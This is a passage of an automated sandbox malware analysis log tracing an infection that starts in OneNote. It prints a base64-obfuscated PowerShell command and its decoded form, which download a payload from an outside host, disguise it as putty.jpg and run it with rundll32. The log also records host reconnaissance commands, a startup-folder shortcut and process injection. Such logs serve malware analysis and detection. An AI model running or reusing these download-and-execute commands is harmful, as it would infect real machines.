          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
          Source: C:\Windows\SysWOW64\ROUTE.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -nao
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\whoami.exe whoami /all
          Source: C:\Windows\SysWOW64\whoami.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess created: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE /tsrJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo=')) Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K C:\ProgramData\in.cmdJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Invoke-WebRequest -URI https://tassoinmobiliaria.com/56G0/01.gif -OutFile C:\programdata\putty.jpgJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,WindJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 C:\programdata\putty.jpg,WindJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\backgroundTaskHost.exe C:\Windows\SysWOW64\backgroundTaskHost.exeJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\net.exe net viewJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c setJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -aJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /allJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\net.exe net shareJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route printJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE netstat -naoJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\whoami.exe whoami /allJump to behavior
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 shareJump to behavior
          Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Local\Temp\{F240886F-595A-4B76-A1BE-CF9D49A0F922} - OProcSessId.datJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1000D972 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,13_2_1000D972
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1000CD1E CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,13_2_1000CD1E
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\programdata\putty.jpg,Wind
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:304:WilStaging_02
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeMutant created: \Sessions\1\BaseNamedObjects\{8F23BFA6-4341-4110-A132-4CF36F972AD2}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2708:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:304:WilStaging_02
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeMutant created: \Sessions\1\BaseNamedObjects\{6891FDE2-F697-4105-9C02-7727FAB36AE9}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8056:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXEMutant created: \Sessions\1\BaseNamedObjects\OneNoteM:AppShared
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2248:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2708:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1456:304:WilStaging_02
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{8F23BFA6-4341-4110-A132-4CF36F972AD2}
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:304:WilStaging_02
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
          Source: Binary string: amstream.pdb source: backgroundTaskHost.exe, 0000000E.00000003.5728609829.0000000004551000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 6153a066.dll.13.dr
          Source: Binary string: wntdll.pdb source: 6153a066.dll.13.dr
          Source: Binary string: amstream.pdbGCTL source: backgroundTaskHost.exe, 0000000E.00000003.5728609829.0000000004551000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo='))
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo=')) Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_693A656F pushad ; ret 13_2_693A6578
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_1000970D LoadLibraryA,GetProcAddress,13_2_1000970D
          Source: 6153a066.dll.13.drStatic PE information: 0x8A32A22A [Mon Jun 22 08:22:02 2043 UTC]
          Source: 6153a066.dll.13.drStatic PE information: section name: RT
          Source: 6153a066.dll.13.drStatic PE information: section name: .mrdata
          Source: 6153a066.dll.13.drStatic PE information: section name: .00cfg
          Source: putty.jpg.11.drStatic PE information: real checksum: 0x71bb8 should be: 0xb47e
          Source: initial sampleStatic PE information: section name: .text entropy: 6.845118704586284

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\putty.jpgJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\putty.jpgJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Temp\6153a066.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\ProgramData\putty.jpgJump to dropped file

          Boot Survival

          barindex
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\whoami.exe whoami /all
          Source: C:\Windows\SysWOW64\backgroundTaskHost.exeProcess created: C:\Windows\SysWOW64\whoami.exe whoami /allJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnkJump to behavior

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\SysWOW64\rundll32.exeModule Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\6153A066.DLL reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 4564 base: 201790 value: E9 2E FE 66 02 Jump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
